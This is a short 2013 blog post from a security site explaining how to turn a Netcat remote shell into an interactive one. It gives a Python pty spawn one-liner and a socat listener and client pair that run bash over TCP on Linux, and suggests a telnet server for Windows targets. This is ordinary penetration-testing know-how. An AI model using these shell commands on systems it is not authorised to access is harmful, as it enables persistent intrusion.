From a non interactive shell to an interactive one
GoSecure! (https://www.gosecure.it/blog), Tue, 18 Jun 2013 10:08:59 +0000
https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/

As you can read at the end of this post, a remote shell using command execution (-e cmd.exe or /bin/bash) isn’t a fully interactive command prompt.
These are the solutions I found to get a more stable shell. Note that I don’t talk about web remote shells such as c99, c100, weevely or other PHP/ASP code that needs a web server. I also don’t want to talk about MSFvenom and similar tools; I focused on something similar to NC or SSH.

The target is a Linux system.
Using Python:
After you get a Netcat remote shell, execute:

python -c 'import pty; pty.spawn("/bin/bash");'

This is not completely interactive, but it is better than before.

It is better to use socat, which is a more complex variant of netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a fully interactive remote shell.

The target is a Windows system.
I suppose that in a Microsoft environment you don’t have Python or socat, although both programs have Windows binaries.
So the best way I found is to start a telnet server. Googling, I found some standalone programs like TelnetD. Note that it isn’t free software, but you can try it using the trial version.
